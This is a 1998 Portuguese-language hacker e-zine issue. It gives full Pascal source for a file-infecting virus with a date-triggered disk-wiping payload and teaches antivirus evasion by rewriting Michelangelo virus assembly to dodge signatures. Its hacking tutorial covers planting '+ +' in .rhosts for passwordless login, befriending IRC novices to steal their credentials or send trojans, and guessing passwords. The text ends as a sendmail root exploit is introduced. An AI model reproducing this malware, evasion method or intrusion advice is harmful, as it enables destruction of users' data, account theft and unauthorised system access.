//// //// //////// //////// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// ///////////// //////////// //// //////// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //// //////// //// //// ²±°°°°°°° ²±° ²±° ²±°°°°°°° [ Numero: 03, Fevereiro de 1998 ] ²±° ²±° ²±° ²±° ²±° ²±° ²±° ²±° ²±° ²±° ²±° ²±° [ Hack and Phreak Group ] ²±°°°°°°° ²±°°°°²±° ²±°°°°°°° ²±° ²±° ²±° ²±° ²±° [ http://www.hackphr.home.ml.org ] ²±° ²±° ²±° ²±° ²±° ²±° ²±° ²±° ²±° ²±° ASCii by MaNdRaCk -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- VERSAO APENAS PARA MS-DOS. RECOMENDADO CARREGAR O DRiVER COUNTRY.SYS -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- MeMbrOs AtUAiS: (listados por ordem de ingresso no zine) - MaNdRaCk - mandrack@geocities.com - Cebola - cebola_br@hotmail.com - ShK - shk_hack_@hotmail.com - HaCk-MaN - hack.man@mailcity.com - SideW - PaRTiCiPA‡AO EsPeCiAL De: - GhOsT InVaDeR - UHF ZINE - http://uhf.base.org ghostin@freemail.globalsite.com.br OBS.: Editores temporarios, candidatos e contribuidores tmb sao listados... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- *** **** *** ****** ******* *** *** *** *** * *** *** *** *** *** *** *** *** * *** *** *** ****** *** *** *** **** *** *** *** *** *** *** *** *** ******* ********* *** *** ====================== = = = = = = = = = = = = = = 01| INTRODU€AO - by MaNdRaCk ------------------------------------------- - - - - - - - 02| ViRii - by Cebola ------------------------------------------- - - - - - - - 03| INTRODU€AO AO HACKING - PARTE II - by MaNdRaCk ------------------------------------------- - - - - - - - 04| BACKDOORS - by ShK ------------------------------------------- - - - - - - - 05| COMPLEMENTANDO OS NUMEROS BINARIOS - by HaCk-MaN ------------------------------------------- - - - - - - - 06| BACKDOOR SH - by GhOsT InVaDeR ------------------------------------------- - - - - - - - 07| PLACAS DE CIRCUITO IMPRESSO - by MaNdRaCk ------------------------------------------- - - - - - - - 08| BOX - TRANSMISSOR FM OCULTO - by MaNdRaCk ------------------------------------------- - - - - - - - 09| SHADOW PASSWD - by SideW ------------------------------------------- - - - - - - - 10| CORREIO DA GALERA - by HackPHR ------------------------------------------- - - - - - - - 11| ANUNCIOS, PUBLICA€OES & MISC. - by HackPHR ------------------------------------------- - - - - - - - 12| ENTRANDO EM CONTATO - by HackPHR ------------------------------------------- - - - - - - - 13| BRINDE: EXPLOIT P/ NETSCAPE E IE - by MaNdRaCk ------------------------------------------- - - - - - - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 01 - INTRODU€AO -=-=-=-=-=-=-=-=-=- Ai pessoal, estou abrindo aki a edi‡ao de Fevereiro, a primeira de 98, com todo o pique, o zine nao podia estar melhor, e agrade‡o a todos os leitores, o sucesso do zine nos devemos a vcz... O numero de editores aumentando, dah pra fazer o zine sempre grandaiao, hehehe... Bom, voltando a falar sobre edi- tores, eu pe‡o q nao mandem mais mails se candidatando, falem diretamente com um de nossos editores, todo fim de semana, geralmente a tarde no nosso querido canal de mIRC. Fica bem melhor pra gente, nao precisa ficar com medo, se vc acha q tem chance e tem medo q a gente acha q vc sabe pouco, nao vamos fazer nada de mal, como vovo jah dizia: quem nao arrisca nao petisca... hehehe... Ah, nosso Home Page tambem mudou de URL e de cara, agora eh soh digitar http://www.hackphr.home.ml.org, pronto, lah soh vai ter o nosso zine e mais uns progz q a gente fez, outros zines mais tarde, a pagina de outros zines ainda tah em constru‡ao, ainda a proxima edi‡ao, vcz podem contar nos dedos, 01 de Mar‡o, vamos lutar o maximo pro zine ser mensal, pois nao podemos dar bobeira pro nosso zine nao cair de circula‡ao. Pois hoje em dia tem uma porra- da e meia de zines, em tudo q eh lugar, pena q a maioria eh "xerox" dos outros e puxa-saco da Axur, como se adiantasse muito... Hamm, nesse zine vcz vao encontrar algumas materias interessantes, tmb po- dem notar q temos a participa‡ao de nosso amigo Ghostin da UHF, ele escreveu uma materia sobre Backdoors. Temos ainda a participa‡ao do ShK e do HaCk-MaN, eles apenas escreveram uma materia pequena cada um, tmb nao conseguimos falar com eles ultimamente, nao estamos recebendo reply... Esta edi‡ao jah come‡a arrebentando com uma materia muito massa do Cebola, com o source de um virus novo feito por ele mesmo, logo apos temos a continua- ‡ao da minha materia sobre hacking para iniciantes. Pro final ainda temos uma materia minha sobre uma box e um guia para soldagem e confec‡ao de placas de cicuito impresso, eu queria colocar mais coisas, principalmente de uns caras que escreveram pra gente, mas jah tava chegando o dia 01 de Fevereiro e eu nao queria atrasar... Soh deu pra colocar uma materia pequena q o SideW fez. Espero q gostem, e preparem o folego pra 04... 1998, MaNdRaCk - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 02 - ViRii -=-=-=-=-=-=-=- A¡, galera. Ano novo, revista nova, virus novo. Enquanto muita gente tava a¡ co‡ando o saco, eu tava aqui ralando, estudando muito(hacking, ‚ claro) e desenvolvendo um novo virus para essa edi‡Æo do zine. Vai a¡ um resumo das mat‚rias virii: * Continua‡Æo do tutorial de variantes de virus * Virus completo com caracter¡sticas Stealth feito em Pascal O algor¡timo para gera‡Æo de n£meros de cartäes de cr‚dito eu fico devendo para a pr¢xima edi‡Æo, j  que a parte virii dessa edi‡Æo deu quase 700 linhas. Tutorial de como escrever variantes(parte II) --------------------------------------------- Na £ltima edi‡Æo do zine eu dei o source do Michelangelo, que vai ser muito £til nesse tutorial sobre variantes. Sei que mais algu‚m j  deve ter es- crito sobre isso, inclusive encontrei uma mat‚ria em um zine americano, mas tava meio confuso, entÆo eu resolvi escrever a minha mat‚ria, que deve estar bem f cil de se entender, inclusive para os beginners. Vocˆ vai precisar de pelo menos algum pequeno conhecimento em Assembler para isso. Como j  temos o source do virus fica muito mais f cil. A primeira coisa a se fazer ‚ salvar o source em um arquivo e compilar com qualquer compilador ASSEMBLER. Eu uso o A86, na minha opiniÆo ‚ o melhor porque ‚ shareware e suporta todos os formatos de linguagem Assembly. Ap¢s compilar o source, vocˆ vai perceber que qualquer antivirus merdinha ‚ capaz de acusar a presen‡a do Michelangelo no arquivo. Eu usei a £ltima atualiza‡Æo do Viruscan para esses testes, se vocˆ for usar outro antivirus talvez os resultados sejam um pouco diferentes. O primeiro passo ‚ dividir o source em pequenos peda‡os, que ali s j  estÆo divididos, como: Int13h, Check_infection, Infect_it, etc... Esses sÆo os labels usados no virus, e sÆo bastante £teis para se organizar o programa em blocos. A finalidade de dividir o source nesses labels ‚ de descobrir onde est  a assinatura do virus. Ou seja, atrav‚s de que parte do source do virus compilado que o antivirus identifica o virus. O que n¢s vamos fazer ‚ achar a assinatura do virus e mudar os comandos, afim de modificar o source mas nÆo alterar o efeito do virus. Se vocˆ tem algum conhecimento em ASM, deve saber que vocˆ pode mudar a ordem dos atributos dados aos registros sem qualquer dano ao source, desde que a chamada da interrup‡Æo fique por £ltimo. Assim, MOV AH, 16 MOV BX, 123 INT 21 ‚ igual a MOV BX, 123 MOV AH, 16 INT 21 Lembre-se que eu acabei de inventar esse exemplo, e nÆo tenho a m¡nima id‚ia do que isso vai fazer depois de compilado. Outra regra: evidentemente quando vocˆ copia o valor de uma vari vel dentro de outra a ordem deve ser res peitada. EX: MOV AH, 16 MOV DH, AH INT 23 ‚ diferente de MOV DH, AH MOV AH, 16 INT 23 No primeiro exemplo estariamos assignando o valor 16 ao registrador AH e depois assigna o valor AH ao registrador DH. EntÆo ficaria: AH=DH=16. Ele ‚ diferente do segundo exemplo porque o segundo exemplo faria o seguinte: d  o valor AH ao registrador DH, ficariam AH=DH=0. Depois d  ao registrador AH o valor 16. No final entÆo s¢ o registrador AH estaria com valor=16. Se vocˆ nÆo entendeu, vai aprender assembly e depois vem ler essa mat‚ria. Bom, voltando ao que interessa, o primeiro passo ‚ come‡ar a retirar partes do c¢digo do virus e compilar o c¢digo sem esses peda‡os. Se o antivirus ainda acusa o virus, vocˆ ainda nÆo chegou na sua assinatura. Por exemplo: vocˆ retira do c¢digo do Michelangelo dado na £ltima edi‡Æo o label INT13H. Vocˆ compila o c¢digo obtido e o antivirus nÆo acusa a presen‡a de virus. Isso quer dizer que o peda‡o do virus que o identifica para o antivirus(a assinatura do virus) ficou no peda‡o que vocˆ retirou. EntÆo, a assinatura do virus est  no label INT13H. Bom, ‚ s¢ uma suposi‡Æo. Outro cuidado a ser tomado ‚ quanto … referencia feita no programa aos labels. Por exemplo, se vocˆ vai retirar um label chamado "teste" e no resto do virus h  uma linha que diz JNE TESTE na hora de compilar o compilador vai gerar um erro. A solu‡Æo ‚ simplesmente colocar um ponto e v¡rgula antes da linha, declarando essa linha como um coment rio. Ficaria assim: ; JNE TESTE ‚ s¢ um modo de se evitar o erro. Depois deve-se retirar os pontos-e- v¡rgulas para nÆo mudar o c¢digo viral. EntÆo depois dessa teoria toda vamos … pratica: Comece retirando peda‡os do virus. Na maioria dos casos a assinatura fica no in¡cio do virus. EntÆo comece retirando a segunda metade do virus. Eu comecei apagando tudo o que vem depois do label entervirus. Compilei e executei o scan: o virus con- tinuava detect vel. Comecei agora retirando peda‡os do in¡cio. Retirei o pri- meiro label, o antivirus continuava detectando. Retirei o segundo, tamb‚m. Continuei assim at‚ s¢ restar o label entervirus. EntÆo uma coisa interessante aconteceu: o antivirus passou a reconhecer o arquivo como sendo infectado pelo virus GENB!!! Chegamos … conclusÆo que o GENB ‚ quase uma variante do Michelangelo. Eu consegui isolar a parte do Michelangelo que o identifica como GENB, entÆo achei a assinatura do GENB. A assinatura do GENB fica entre esse peda‡o de c¢digo: ************************* GENB ************************* michelangelo segment byte public assume cs:michelangelo, ds:michelangelo org 0 highmemjmp db 0F5h, 00h, 80h, 9Fh maxhead db 2 ; used by damagestuff firstsector dw 3 oldint13h dd 0C8000256h entervirus: xor ax,ax mov ds,ax cli mov ss,ax mov ax,7C00h ; Set stack to just below mov sp,ax ; virus load point sti push ds ; save 0:7C00h on stack for push ax ; later retf mov ax,ds:[13h*4] mov word ptr ds:[7C00h+offset oldint13h],ax mov ax,ds:[13h*4+2] mov word ptr ds:[7C00h+offset oldint13h+2],ax mov ax,ds:[413h] ; memory size in K dec ax ; 1024 K dec ax mov ds:[413h],ax ; move new value in mov cl,6 shl ax,cl ; ax = paragraphs of memory mov es,ax ; next line sets seg of jmp mov word ptr ds:[7C00h+2+offset highmemjmp],ax mov ds:[13h*4],ax mov ds:[13h*4+2],es mov cx,offset partitioninfo mov si,7C00h xor di,di cld rep movsb ; copy to high memory ; and transfer control there ; destination of highmem jmp xor ax,ax mov es,ax push cs pop ds mov ax,201h mov bx,7C00h mov cx,firstsector cmp cx,7 ; hard disk infection? mov dx,80h ; Read old partition table of ; The following bytes are meaningless. garbage db 1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h partitioninfo: db 42h dup (0) michelangelo ends end *****************************************  Bom lembrar que nÆo temos … mÆo o virus GENB. Se vocˆ compilar esse source e rodar no computador vocˆ nÆo vai estar executando o virus GENB, mas somente um peda‡o dele que cont‚m a sua assinatura. Bom, voltamos entÆo ao Michelangelo. Eu tinha acabado de retirar o label IS360KDISK e nosso virus ficou indetect vel(passou a detectar o GENB no lugar). EntÆo recoloque o label is360Kdisk no lugar. Conseguimos isolar agora um peda‡o de pequeno tamanho do virus que cont‚m a assinatura. NÆo temos em mÆo necessariamente a assinatura, mas um peda‡o que a cont‚m. Eis esse peda‡o: ********** ASSINATURA ************* michelangelo segment byte public assume cs:michelangelo, ds:michelangelo org 0 jmp entervirus highmemjmp db 0F5h, 00h, 80h, 9Fh maxhead db 2 ; used by damagestuff firstsector dw 3 oldint13h dd 0C8000256h is360Kdisk: mov firstsector,cx pushf call oldint13h ; jc quitinfect ; exit on error mov si,200h+offset partitioninfo mov di,offset partitioninfo mov cx,21h ; Copy partition table cld rep movsw mov ax,301h ; Write virus to sector 1 xor bx,bx mov cx,1 xor dx,dx pushf call oldint13h entervirus: xor ax,ax mov ds,ax cli mov ss,ax mov ax,7C00h ; Set stack to just below mov sp,ax ; virus load point sti push ds ; save 0:7C00h on stack for push ax ; later retf mov ax,ds:[13h*4] mov word ptr ds:[7C00h+offset oldint13h],ax mov ax,ds:[13h*4+2] mov word ptr ds:[7C00h+offset oldint13h+2],ax mov ax,ds:[413h] ; memory size in K dec ax ; 1024 K dec ax mov ds:[413h],ax ; move new value in mov cl,6 shl ax,cl ; ax = paragraphs of memory mov es,ax ; next line sets seg of jmp mov word ptr ds:[7C00h+2+offset highmemjmp],ax ; mov ax,offset int13h mov ds:[13h*4],ax mov ds:[13h*4+2],es ; mov cx,offset partitioninfo mov si,7C00h xor di,di cld rep movsb ; copy to high memory ; and transfer control there jmp dword ptr cs:[7C00h+offset highmemjmp] ; destination of highmem jmp xor ax,ax mov es,ax int 13h ; reset disk push cs pop ds mov ax,201h mov bx,7C00h mov cx,firstsector cmp cx,7 ; hard disk infection? ; jne floppyboot ; if not, do floppies mov dx,80h ; Read old partition table of int 13h ; first hard disk to 0:7C00h ; jmp short exitvirus ; The following bytes are meaningless. garbage db 1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h partitioninfo: db 42h dup (0) michelangelo ends end *********** ASSINATURA ********** As linhas que tˆm um ponto-e-v¡rgula antes faziam referˆncia a um label que foi retirado do c¢digo. Depois de construir a sua variantes, vocˆ deve retirar esses pontos e v¡rgulas. Bom, agora que vocˆ tem o peda‡o de c¢digo que cont‚m a assinatura do virus vocˆ deve modificar esse peda‡o de c¢digo … vontade, mas nunca retirando nada at‚ obter um c¢digo que nÆo seja reconhecido pelo antivirus. Um exemplo ‚ mudando as linhas que dizem: MOV ax,201h MOV bx,7CH00 para MOV bx,7CH00 MOV ax,201h Cuidado para nÆo cometer nenhum dos erros que listei acima e sempre deixar a chamada … interrup‡Æo por £ltimo. Se vocˆ conseguir um c¢digo que se torne invis¡vel para o antivirus, copie esse peda‡o de c¢digo para dentro do virus original(que foi dado na edi‡Æo 02 desse zine), substituindo o antigo, ou seja, apague os labels IS360KDISK e ENTERVIRUS do virus original e os substitua com os que vocˆ modificou e nÆo foram achados pelo antivirus. Compile e passe o antivirus agora pela variante que vocˆ gerou. Se o antivirus nÆo o detectar, se alegre: vocˆ criou uma das trocentas variantes do Michelangelo. Se vocˆ conseguiu, salve o c¢digo fonte(.ASM) em um arquivo e me mande. Eu terei prazer em colocar o seu nome aqui na pr¢xima edi‡Æo da revista! Mensagens para: cebola_br@hotmail.com Virus com caracter¡sticas Stealth feito em Pascal ------------------------------------------------- Eu andei pesquisando muitos virus nessas f‚rias, e acabei produzindo um que, na minha opiniÆo, superou todos os outros que eu j  tinha visto feitos em pascal. A vantagem de se usar linguagens de alto n¡vel ‚ que sÆo menos pro- p¡cias a erro, permitem um controle sobre o fluxo do programa(se vocˆ usar um bom editor como o Turbo Pascal) e o c¢digo fica bem menor. Mas quando se trata de v¡rus(e nÆo cavalo de tr¢ia) ‚ sempre bom usar linguagens compiladas e nÆo interpretadas. Linguagens compiladas sÆo: Pascal, C, C++, Delphi... Linguagens interpretadas sÆo: Basic, Qbasic, Vbasic, Java... A desvantagens das interpre- tadas ‚ que sÆo muito lentas, e no caso de virus(que normalmente devem execu- tar sua rotina de infec‡Æo sem o usu rio perceber) isso ‚ necessariamente muito importante. O c¢digo dado a seguir vem com os coment rios em formato Pascal-padrÆo (usando chaves) e nÆo ‚ necess rio a retirada destes para a compila‡Æo do pro- grama. Diferente de que muita gente acha, os coment rios nÆo aumentam o tama- nho do programa compilado, e sÆo muito £teis para terceiros entenderem o c¢- digo. ================== Virus HANTA versÆo 1.0 ======================== Program Virus_HANTA; {VIRUS HANTA VERSÇO 1.0 BY CEBOLA DATA DE CRIA€ÇO: 22/01/1998 BELO HORIZONTE, MG "NÇO VOU FICAR IMPLORANDO PRA NÇO ALTERAREM O CàDIGO MAS TENHA EM MENTE QUE, SE VOCÒ ALTERAR  UM LAMMER SEM CRIATIVIDADE!!!" BUGS E CORRE€åES PARA: cebola_br@hotmail.com} {diretiva M define o tamanho da pilha dinamica para liberar mais memoria e eliminar o bug DosError 8(out of memory) na linha que chama o programa original} {$M 16384,0,0} {$Q-} {$R-} Uses Windos,dos,crt; var curdir: string; dir: SearchRec; x: integer; attrib: byte; procedure age; var dia,dia_semana,mes,ano: word; regs: Registers; begin getdate(ano,mes,dia,dia_semana); {O VIRUS AGE NOS DIAS 11/12 E NAS SEXTAS-FEIRAS DIA TREZE} if ((dia=12) and (mes=11)) or ((dia=13) and (dia_semana=5)) then begin clrscr; for x:=1 to 12 do begin textcolor(x); gotoxy(x,5); writeln(' _________-----_____'); gotoxy(x,6); writeln(' _____------ __ ----_'); gotoxy(x,7); writeln('___---- ___------ \'); gotoxy(x,8); writeln(' ----________ ---- \'); gotoxy(x,9); writeln(' -----__ | _____)'); gotoxy(x,10); writeln(' __- / \'); gotoxy(x,11); writeln(' _______----- ___-- \ /)\'); gotoxy(x,12); writeln(' ------_______ ---____ \__/ /'); gotoxy(x,13); writeln(' -----__ \ -- _ /\'); gotoxy(x,14); writeln(' --__--__ \_____/ \_/\'); gotoxy(x,15); writeln(' ----| / |'); gotoxy(x,16); writeln(' | |___________|'); gotoxy(x,17); writeln(' | | ((_(_)| )_)'); gotoxy(x,18); writeln(' | \_((_(_)|/(_)'); gotoxy(x,19); writeln(' \ ('); gotoxy(x,20); writeln(' \_____________)'); delay(500); end; delay(10000); clrscr; gotoxy(1,5); writeln('ÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛÛ'); gotoxy(1,6); writeln('ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ'); gotoxy(1,7); writeln('ÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛ Û ÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛÛ'); gotoxy(1,8); writeln('ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ'); gotoxy(1,9); writeln('ÛÛ± ÛÛ ÛÛ ±ÛÛ ÛÛ ÛÛ ±ÛÛ ÛÛ± ÛÛ °ÛÛÛ± ±ÛÛ ÛÛ ±ÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛÛ'); gotoxy(1,10); writeln('±±± ±± ±± ±±± ±± ±± ±±± ±±± ±± °±±± ±± ±± ±± ±± °± ±± ±±'); gotoxy(2,11); writeln('±± ±° ±± ±± ±± °± ±± ±± ±° °±± ±± ±± °± ±± ±° ±± ±±'); gotoxy(2,12); writeln('°° °± °° °° °° ±° °° °° °± °± ± °± ° °± ±± °± ±°'); gotoxy(3,13); writeln('° ±° ±° ° ° °° °° °° ° ° ° ±° °° °° ±° °°'); gotoxy(5,14); writeln('°° ° ° ° ° ° ° ° ° °° ° °'); gotoxy(6,15); writeln('° °'); delay(10000); {regrava todas as trilhas do disco r¡gido} Regs.ah:=$19; intr($21,regs); Regs.cx:=$0009; Regs.dx:=$0; intr($26,regs); end; end; function save_old_attrib(arquivo:string): byte; {Salva os atributos do arquivo a ser executado para depois de infectado voltar com os atributos antigos} var attr: word; arq: file; begin assign(arq,arquivo); GetFAttr(arq,attr); save_old_attrib:=attr; end; procedure put_old_attrib(arquivo:string; attrib:word); {resgata os atributos antigos do arquivo j  infectado e os recoloca no arquivo} var arq: file; begin assign(arq,arquivo); SetFAttr(arq,attrib); end; function check_infection(nome : string): boolean; {CHECA SE O ARQUIVO A SER INFECTADO Jµ ESTµ INFECTADO} var arq,temp: text; i: integer; a,b,c,d: char; begin {***} {acha o arquivo atual, contendo o c¢digo do virus} assign(arq,nome); reset(arq); assign(temp,'temp.dat'); rewrite(temp); for i:=1 to 13 do read(arq,a); read(arq,a); write(temp,ord(a)); write(temp,' '); for i:=1 to 22 do read(arq,b); read(arq,b); write(temp,ord(b)); write(temp,' '); for i:=1 to 60 do read(arq,c); read(arq,c); write(temp,ord(c)); write(temp,' '); for i:=1 to 77 do read(arq,d); read(arq,d); write(temp,ord(d)); if (a=chr(4)) and (b=chr(141)) and (c=chr(7)) and (d=chr(0)) then begin check_infection:=true; close(arq); close(temp); end else begin check_infection:=false; close(arq); close(temp); end; {***} end; procedure infect_directory; var infile, outfile: file; curdir,vitima,virus: string; arquivo, arquivo2: SearchRec; size,actlen,curlen: longint; result: word; buffer: array[1..1000] of char; buffer2: array[1..928] of char; virusfile,tempfile: text; a,b,c,d: char; sign: char; i: integer; infected: boolean; const all:byte=$3F; begin {retorna o diretorio atual} getdir(0,curdir); {procura o 1§ arquivo COM para infectar} findfirst(curdir+'\'+'*.com',all,arquivo); while doserror=0 do begin clrscr; {garante que ‚ um arquivo(attr=32) e nÆo um diret¢rio(attr=16)} if (arquivo.attr=32) and (arquivo.name<>'TEMP.COM') then begin {verifica se j  nÆo est  infectado} infected:=check_infection(arquivo.name); if infected=false then begin {guarda na vari vel vitima o arquivo a ser infectado} vitima:=arquivo.name; {salva os atributos antigos} attrib:=save_old_attrib(arquivo.name); {guarda na variavel virus o nome do arquivo contendo o c¢digo viral} virus:=paramstr(0); {copia o virus pro arquivo} assign(infile,virus); assign(outfile,'temp.com'); reset(infile,1); rewrite(outfile,1); for i:=1 to 12 do begin blockread(infile, buffer, 1000, result); blockwrite(outfile, buffer, 1000, result); end; blockread(infile, buffer2, 864, result); blockwrite(outfile, buffer2, 864, result); close(infile); {copia o original pro final do arquivo} assign(infile,vitima); {abre o arquivo e define um registro=1byte} reset(infile,1); {retorna o tamanho do arquivo} size:=filesize(infile); actlen := 0; {outputfile} curlen := size; {inputfile} while actlen < curlen do begin blockread(infile, buffer, 1000, result); if actlen + 1000 > curlen then begin blockwrite(outfile, buffer, curlen - actlen, result); actlen := curlen; end else begin blockwrite(outfile,buffer,1000,result); inc(actlen,1000); end; end; close(infile); close(outfile); {DEPOIS DE PRONTO, O ARQUIVO TEMP COM VAI FICAR ASSIM: --------------------------- | VIRUS | ORIGINAL | | | | --------------------------- ENTÇO FECHA O ARQUIVO TEMP.COM, DELETA O ARQUIVO ORIGINAL E RENOMEIA O TEMP.COM PARA PARA O NOME DO ORIGINAL} assign(infile,vitima); erase(infile); assign(outfile,'TEMP.COM'); rename(outfile,vitima); put_old_attrib(vitima,attrib); end; end; findnext(arquivo); end; end; procedure exec_original; {RETIRA O ORIGINAL DO FINAL DO ARQUIVO SENDO EXECUTADO E SALVA EM ARQUIVO TEMPORµRIO PARA DEPOIS EXECUTAR} var infile: file; outfile: file; size,actlen,curlen: longint; buffer: array[1..1000] of char; result: word; parametros: string; i: integer; begin assign(infile,paramstr(0)); assign(outfile,'a.com'); reset(infile,1); rewrite(outfile,1); seek(infile,12864); size:=filesize(infile); actlen := 0; {outputfile} curlen := size-12864; {inputfile} while actlen < curlen do begin blockread(infile, buffer, 1000, result); if actlen + 1000 > curlen then begin blockwrite(outfile, buffer, curlen - actlen, result); actlen := curlen; end else begin blockwrite(outfile,buffer,1000,result); inc(actlen,1000); end; end; close(infile); close(outfile); if paramcount=0 then begin exec('a.com',''); chdir(curdir); end else begin parametros:=paramstr(1); if paramcount>1 then begin for i:=2 to paramcount do parametros:=parametros+' '+paramstr(i); end; exec('a.com',parametros); chdir(curdir); end; end; begin {LEMBRAR DE TIRAR OS ATTRIBS DE SOMENTE LEITURA SE Jµ EXISTIR UM ARQUIVO NO DIRETàRIO A SE INFECTAR CHAMADO TEMP.COM} getdir(0,curdir); infect_directory; findfirst('curdir'+'\'+'*.*',$3F,Dir); While doserror=0 do begin if dir.attr=16 then infect_directory else findnext(dir); end; exec_original; age; end. =================== FIM DO CàDIGO =================== Bom, por essa edi‡Æo ‚ s¢. Cr¡ticas, sugestäes, relatamentos de bugs nos programas aqui listados: cebola_br@hotmail.com Se quiser usar PGP: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2i mQCNAzSgZvwAAAEEAM7Fl1R3Kd8sXY0eWm5H+0XKOBO3g6ifpFaz6G+EVW7jjeMO hs9qW5Kco0bxHOAb8qfILAq3604MtnjiU/yCpk95ZbKjB7GonNeMQVwlhvdAIzyc A+FvKBzLegWVUz2g3mEs3K1bq16HQFrg4h/w7wTbh8JYmDAh4g5foeaTuHMRAAUR tC9GcmVkZXJpY28gV2FnbmVyIE8uIE1lbG8gPGxvcmVuemFAYmhuZXQuY29tLmJy Pg== =OV6h -----END PGP PUBLIC KEY BLOCK----- 1998, Cebola - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 03 - INTRODU€AO AO HACKING - PARTE II -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Agora a continua‡ao do q eu escrevi na edi‡ao passada, depois de ter publi- cado, vieram uns caras me dizendo: - Meu cara, vc fez uma materia na ed. 02 q dizia q ia ensinar a hackear, mas nao ensinou nada sobre como Hackear... Meus amigos, hackear nao eh vc ter de cor uns comandos pra copiar o passwd, nao eh facil, vc tem q ter muito planejamento, muita estrategia, nao eh soh copiar o q estah escrito naquele zine, q se vc fazer isso vc ganha acesso root vc deve criar seus metodos, como? Entendendo, exige estudo, sem antes entender um Sistema Operacional, como vc quer hackea-lo? Quem nao entende o sistema e consegue fazer algo nele, nao o hackeia, mas sim, LAMMEREIA. Portanto aih vai a continua‡ao, e se vc acha q tah fraco, q nao ensina nada, esse zine nao eh pra vc, pare de ler e apague-o de seu HD... Bom, sem enrola‡ao, vamos lah: Usando Rlogin -=-=-=-=-=-=-=- O Rlogin eh um outro comando para logar em sistemas, se vc nao tiver uma conta em alguma maquina, existe uma manha do Rlogin, pra vc logar sem ter a password. O comando tem a seguinte sintaxe: rlogin -l username host.com.br Para obter maiores informa‡oes sobre o Rlogin, veja o manual dele: $ man rlogin O Rlogin funciona da seguinte maneira, vc jah digita o username na linha de comando e ele jah vai pedir a password, vamos a um exemplo: $ rlogin -l mandrack lamer.com.br connecting... password: $ Depois de digitar a password logo cai o shell da maquina q vc logou. Bom, antes de testar seu Rlogin, verifique se ele tem um arquivo .rhosts no direto- rio em q ele estah, por exemplo /bin. Note q ha um ponto na frente de rhosts, is quer dizer q o arquivo eh oculto, entao vc devera dar o comando ls -a: $ ls -a .rhosts rlogin $ Beleza ele tah lah, quer dizer q vc agora pode logar sem ter q colocar a password! Fa‡a o seguinte, edite o arquivo .rhosts, vc vai verificar q lah existem os usernames e os hosts, embaixo do host q vc pretende atacar, coloque a seguinte linha: --corte-- + + --corte-- Saia do editor e grave o arquivo... Soh isso??? Ehh, soh isso mano, agora eh soh se divertir... SE VC NAO TIVER UMA CONTA -=-=-=-=-=-=-=-=-=-=-=-=-=- Bom, eh logico q para pegar acesso root vc precisa de uma conta, para isso eu classifico dois metodos, o facil e o dificil. METODO FACIL: Com o metodo facil, vc precisa ter conversa e um programa de IRC. Vc vai ter q exigir muito de sua labia em certos casos, outros nem tanto... Primeiro entre em qquer servidor de IRC, de preferencia a canais #hacking #unix, ou qquer outro onde os hackers se encontram, e onde tem hacker tem la- mer. Fique de olho em varios canais, pra ver se tem um lamer q faz uma pergun- ta tola, alguem vai falar merda pra ele, ou o mais provavel, ele vai ser chu- tado do canal, entao fale com ele em PVT, e responda a pergunta dele, va pu- xando conversa, ate ele ganhar sua confian‡a, aih ve se vc consegue pegar o login e a senha dele, de um jeito, como? Invente, sei lah, se ele usa o Win 3.1 pe‡a os arquivos de configura‡ao dele, invente algo, se ele for mais di- ficil, consiga o e-mail dele e mande um trojan, como aquele q o Cebola falou na se‡ao ViRii da ed. 02 do zine. Ateh q vc consiga o login e a senha do tapa- do... OBS.: Soh fa‡a isso com lamers METODO DIFICIL: Esse eh bem mais chato e exige paciencia. Antes ache o host de um servidor mais novo, q provavelmente usam senhas babacas, ou as mesmas do login, coisa q nao eh dificil acontecer. entao do seu shell fa‡a o seguinte: $ finger @merda.com.br Login Name Tty Idle Login Time Office Office Phone rafa Rafael Papael p2 4:46 Jan 27 11:19 sjm Silvano Jose Medeiros p5 3d Jan 16 15:35 root System Administrator p3 4:59 Jan 16 10:17 OBS: Este eh um finger inventado, se seu nome consta aki eh mera coincidencia! Entao mais tarde, quando sua vitima cair fora do sistema, tente logar: Login: rafa A password, vc terah q chutar, primeiro comece com o mesmo do login, se nao der va tentando: rafael papael Papael rafael98 Coisas assim, se vc conseguir, alem de vc ter uma conta vc tmb eh um cagao, pois esse metodo eh phoda pra caralho!!! PEGANDO ROOT -=-=-=-=-=-=-=- Aki vou por soh uma maneira de ser o root, outras fica pra proxima, q eu jah to de saco cheio. Aki vai um bug do sendmail 8.73 e 8.83. Rode o script abaixo. Vc vai cair no diretorio /tmp. De um ls -l. Se tiver um arquivo SUID 